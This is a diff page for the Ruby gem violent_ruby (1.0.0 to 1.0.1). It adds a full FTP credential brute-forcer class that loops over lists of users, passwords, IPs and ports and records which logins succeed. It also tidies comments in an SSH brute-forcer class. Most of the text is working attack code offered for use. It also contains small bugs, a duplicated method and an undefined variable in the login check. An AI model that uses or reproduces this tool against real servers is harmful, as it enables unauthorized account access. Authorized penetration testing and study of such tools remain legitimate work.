violent_ruby 1.0.0 → 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: cda346e57dd13576d7868364849f39b07f1d3358
|
4
|
+
data.tar.gz: b2bab88d80cfcdcf1905d37e5133290ff2ffacee
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 24d0dd09c999a3e0115b2c845257e01c24d4c4aa662e2c587cf103b0e3811be120c85d3da92af7efbc2ec32708e4effb333155c4d9a406575f0c31b61ee8658e
|
7
|
+
data.tar.gz: d04fa5bd6b888b5210a2332ca099046566296f22977a996b484f82a11c381305269199b40009813f143fee9ab87dde8b6d3298ace24ebc62d413eec287686ad4
|
@@ -1,143 +1,208 @@
|
|
1
1
|
require 'net/ftp'
|
2
2
|
|
3
3
|
module ViolentRuby
|
4
|
-
|
5
|
-
|
6
|
-
|
7
|
-
|
8
|
-
|
9
|
-
|
10
|
-
|
11
|
-
|
12
|
-
|
13
|
-
|
14
|
-
|
15
|
-
|
16
|
-
|
17
|
-
|
18
|
-
|
4
|
+
# The Ftp Brute Forcer class provides a simply way to
|
5
|
+
# brute-force an FTP server's credentials.
|
6
|
+
# @author Kent 'picat' Gruber
|
7
|
+
#
|
8
|
+
# @example Basic Usage
|
9
|
+
# ftp = FtpBruteForcer.new
|
10
|
+
# ftp.users = "resources/ftp_users.txt"
|
11
|
+
# ftp.passwords = "resources/ftp_passwords.txt"
|
12
|
+
# ftp.ips = "resources/ftp_ips.txt"
|
13
|
+
# ftp.ports = "resources/ftp_ports.txt"
|
14
|
+
# # brue'm!
|
15
|
+
# ftp.brute_force!
|
16
|
+
# # => results
|
17
|
+
#
|
18
|
+
class FtpBruteForcer
|
19
|
+
# @attr [String] users Path to file containing users.
|
19
20
|
attr_accessor :users
|
20
|
-
|
21
|
-
|
22
|
-
|
23
|
-
|
24
|
-
#
|
25
|
-
|
26
|
-
|
27
|
-
|
28
|
-
|
29
|
-
|
30
|
-
|
31
|
-
|
32
|
-
|
33
|
-
|
34
|
-
|
35
|
-
|
36
|
-
|
37
|
-
|
38
|
-
|
39
|
-
|
40
|
-
|
41
|
-
|
42
|
-
|
43
|
-
|
44
|
-
|
45
|
-
|
46
|
-
|
47
|
-
|
48
|
-
|
49
|
-
|
50
|
-
|
51
|
-
|
52
|
-
|
53
|
-
|
54
|
-
|
55
|
-
|
56
|
-
|
57
|
-
|
58
|
-
|
59
|
-
|
60
|
-
|
61
|
-
|
62
|
-
|
63
|
-
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
|
70
|
-
|
71
|
-
|
72
|
-
|
73
|
-
|
74
|
-
|
75
|
-
|
76
|
-
|
77
|
-
|
78
|
-
|
79
|
-
|
80
|
-
|
81
|
-
|
82
|
-
|
83
|
-
|
84
|
-
|
85
|
-
|
86
|
-
|
87
|
-
|
88
|
-
|
89
|
-
|
90
|
-
|
91
|
-
|
92
|
-
|
93
|
-
|
94
|
-
|
95
|
-
|
96
|
-
|
97
|
-
|
98
|
-
|
99
|
-
|
100
|
-
|
101
|
-
|
102
|
-
|
103
|
-
|
104
|
-
|
105
|
-
|
106
|
-
|
107
|
-
|
108
|
-
|
109
|
-
|
110
|
-
|
111
|
-
|
112
|
-
|
113
|
-
|
114
|
-
|
115
|
-
|
116
|
-
|
117
|
-
|
118
|
-
|
119
|
-
|
120
|
-
|
121
|
-
|
122
|
-
|
123
|
-
|
124
|
-
|
125
|
-
|
126
|
-
|
127
|
-
|
128
|
-
|
129
|
-
|
130
|
-
|
131
|
-
|
132
|
-
|
133
|
-
|
134
|
-
|
135
|
-
|
136
|
-
|
137
|
-
|
138
|
-
|
139
|
-
|
140
|
-
|
141
|
-
|
142
|
-
|
21
|
+
# @attr [String] passwords Path to file containing passwords.
|
22
|
+
attr_accessor :passwords
|
23
|
+
# @attr [String] ips Path to file containing ip addresses.
|
24
|
+
attr_accessor :ips
|
25
|
+
# @attr [String] ports Path to file containing ports.
|
26
|
+
attr_accessor :ports
|
27
|
+
|
28
|
+
# Create a new Ftp Brute Forcer.
|
29
|
+
#
|
30
|
+
# @param [Hash] args The options to create a new Ftp Brute Forcer.
|
31
|
+
# @param args [String] :users The path to a file of users to attempt.
|
32
|
+
# @param args [String] :passwords The path to a file of passwords to attempt.
|
33
|
+
# @param args [String] :ips The path to a file of server ips to attempt to connect to.
|
34
|
+
# @param args [String] :ports The path to a file of service ports to attempt to connect to.
|
35
|
+
def initialize(args = {})
|
36
|
+
@users = args[:users] if args[:users] && File.readable?(args[:users])
|
37
|
+
@passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
|
38
|
+
@ips = args[:ips] if args[:ips] && File.readable?(args[:ips])
|
39
|
+
@ports = args[:ports] if args[:ports] && File.readable?(args[:ports])
|
40
|
+
@ftp = Net::FTP.new
|
41
|
+
end
|
42
|
+
|
43
|
+
# Brute force some'a dem FTP login credz.
|
44
|
+
#
|
45
|
+
# @param [Hash] args The options to brute force.
|
46
|
+
# @param args [String] :users The path to a file of users to attempt.
|
47
|
+
# @param args [String] :passwords The path to a file of passwords to attempt.
|
48
|
+
# @param args [String] :ips The path to a file of server ips to attempt to connect to.
|
49
|
+
# @param args [String] :ports The path to a file of service ports to attempt to connect to.
|
50
|
+
def brute_force(args = {})
|
51
|
+
meets_our_requirements?(args)
|
52
|
+
results = []
|
53
|
+
ips = args[:ips] || @ips
|
54
|
+
ports = args[:ports] || @ports
|
55
|
+
users = args[:users] || @users
|
56
|
+
passwords = args[:passwords] || @passwords
|
57
|
+
iterate_over(ips).each do |ip|
|
58
|
+
iterate_over(ports).each do |port|
|
59
|
+
next unless connectable?(ip: ip, port: port)
|
60
|
+
iterate_over(users).each do |user|
|
61
|
+
iterate_over(passwords).each do |password|
|
62
|
+
if able_to_login?(ip: ip, port: port, username: user, password: password)
|
63
|
+
result = format_result("SUCCESS", ip, port, user, password)
|
64
|
+
else
|
65
|
+
result = format_result("FAILURE", ip, port, user, password)
|
66
|
+
end
|
67
|
+
results << result
|
68
|
+
yield result if block_given?
|
69
|
+
end
|
70
|
+
end
|
71
|
+
end
|
72
|
+
end
|
73
|
+
results
|
74
|
+
end
|
75
|
+
|
76
|
+
# brute_force! is the same as brute_force
|
77
|
+
alias brute_force! brute_force
|
78
|
+
|
79
|
+
# Check if a given IP address and port can connceted to.
|
80
|
+
# @see #brute_force
|
81
|
+
# @param [Hash] args the options to brute force.
|
82
|
+
# @param args [String] :ip The ip address to attempt to connect to.
|
83
|
+
# @param args [String] :port The port to attempt to connect to.
|
84
|
+
# @return [Boolean]
|
85
|
+
def connectable?(args = {})
|
86
|
+
@ftp.connect(args[:ip], args[:port])
|
87
|
+
return true if @ftp.last_response_code == "220"
|
88
|
+
false
|
89
|
+
rescue
|
90
|
+
false
|
91
|
+
end
|
92
|
+
|
93
|
+
# Check if a given IP address, port, username and passwords
|
94
|
+
# are correct to login.
|
95
|
+
# @see #brute_force
|
96
|
+
# @param [Hash] args
|
97
|
+
# @param args [String] :ip
|
98
|
+
# @param args [String] :port
|
99
|
+
# @param args [String] :username
|
100
|
+
# @param args [String] :password
|
101
|
+
# @return [Boolean]
|
102
|
+
def able_to_login?(args = {})
|
103
|
+
@ftp.connect(args[:ip], args[:port])
|
104
|
+
@ftp.login(args[:username], args[:password])
|
105
|
+
if @ftp.welcome == "230 Login successful.\n"
|
106
|
+
@ftp.close
|
107
|
+
return true
|
108
|
+
end
|
109
|
+
ftp_login.quit
|
110
|
+
false
|
111
|
+
rescue
|
112
|
+
false
|
113
|
+
end
|
114
|
+
|
115
|
+
|
116
|
+
private
|
117
|
+
|
118
|
+
# @api private
|
119
|
+
# Format the results from brute force attempts.
|
120
|
+
# @see #brute_force
|
121
|
+
# @param [String] type
|
122
|
+
# @param [String] ip
|
123
|
+
# @param [Integer] port
|
124
|
+
# @param [String] user
|
125
|
+
# @param [String] password
|
126
|
+
# @return [Hash]
|
127
|
+
def format_result(type, ip, port, user, password)
|
128
|
+
{ time: Time.now, type: type, ip: ip, port: port, user: user, password: password }
|
129
|
+
end
|
130
|
+
|
131
|
+
# @api private
|
132
|
+
# Iterate over each line in a file, stripping each line as it goes.
|
133
|
+
# @see File
|
134
|
+
# @param [String] file
|
135
|
+
# @return [Enumerator]
|
136
|
+
def iterate_over(file)
|
137
|
+
File.foreach(file).map(&:strip)
|
138
|
+
end
|
139
|
+
|
140
|
+
# @api private
|
141
|
+
# Check if the given arguments contain an ip, port, password and user files.
|
142
|
+
# @see #brute_force
|
143
|
+
# @param [Hash] args the options to brute force.
|
144
|
+
# @param args [String] :ips
|
145
|
+
# @param args [String] :ports
|
146
|
+
# @param args [String] :passwords
|
147
|
+
# @param args [String] :users
|
148
|
+
# @return [Boolean]
|
149
|
+
def meets_our_requirements?(args = {})
|
150
|
+
raise "No ip addresses to connect to." unless ips?(args)
|
151
|
+
raise "No ports to connect to." unless ports?(args)
|
152
|
+
raise "No passwords to try." unless passwords?(args)
|
153
|
+
raise "No users to try." unless users?(args)
|
154
|
+
true
|
155
|
+
end
|
156
|
+
|
157
|
+
# @api private
|
158
|
+
# Check if the given arguments contains ips, or has been set.
|
159
|
+
# @see #meets_our_requirements?
|
160
|
+
# @param [Hash] args the options to brute force.
|
161
|
+
# @param args [String] :ips
|
162
|
+
# @return [Boolean]
|
163
|
+
def ips?(args = {})
|
164
|
+
return true if args[:ips] || @ips
|
165
|
+
false
|
166
|
+
end
|
167
|
+
|
168
|
+
# @api private
|
169
|
+
# Check if the given arguments contains passwords, or has been set.
|
170
|
+
# @see #meets_our_requirements?
|
171
|
+
# @param [Hash] args
|
172
|
+
# @param args [String] :passwords
|
173
|
+
# @return [Boolean]
|
174
|
+
def passwords?(args = {})
|
175
|
+
return true if args[:passwords] || @passwords
|
176
|
+
false
|
177
|
+
end
|
178
|
+
def passwords?(args = {})
|
179
|
+
return true if args[:passwords] || @passwords
|
180
|
+
false
|
181
|
+
end
|
182
|
+
|
183
|
+
# @api private
|
184
|
+
# Check if the given arguments contains ports, or has been set.
|
185
|
+
# @see #meets_our_requirements?
|
186
|
+
# @param [Hash] args
|
187
|
+
# @param args [String] :ports
|
188
|
+
# @return [Boolean]
|
189
|
+
def ports?(args = {})
|
190
|
+
return true if args[:ports] || @ports
|
191
|
+
false
|
192
|
+
end
|
193
|
+
|
194
|
+
# @api private
|
195
|
+
# Check if the given arguments contains users, or has been set.
|
196
|
+
# @see #meets_our_requirements?
|
197
|
+
# @param [Hash] args
|
198
|
+
# @param args [String] :users
|
199
|
+
# @return [Boolean]
|
200
|
+
def users?(args = {})
|
201
|
+
return true if args[:users] || @users
|
202
|
+
false
|
203
|
+
end
|
204
|
+
|
205
|
+
|
206
|
+
|
207
|
+
end
|
143
208
|
end
|
@@ -14,7 +14,7 @@ module ViolentRuby
|
|
14
14
|
# ssh.ips = "resources/ssh_ips.txt"
|
15
15
|
# ssh.ports = "resources/ssh_ports.txt"
|
16
16
|
# # brue'm!
|
17
|
-
#
|
17
|
+
# ssh.brute_force!
|
18
18
|
# # => results
|
19
19
|
#
|
20
20
|
class SSHBruteForcer
|
@@ -24,7 +24,7 @@ module ViolentRuby
|
|
24
24
|
attr_accessor :passwords
|
25
25
|
# @attr [String] ips Path to file containing ip addresses.
|
26
26
|
attr_accessor :ips
|
27
|
-
# @attr [String]
|
27
|
+
# @attr [String] ports Path to file containing ports.
|
28
28
|
attr_accessor :ports
|
29
29
|
|
30
30
|
# Create a new SSH Brute Forcer.
|
data/lib/violent_ruby/version.rb
CHANGED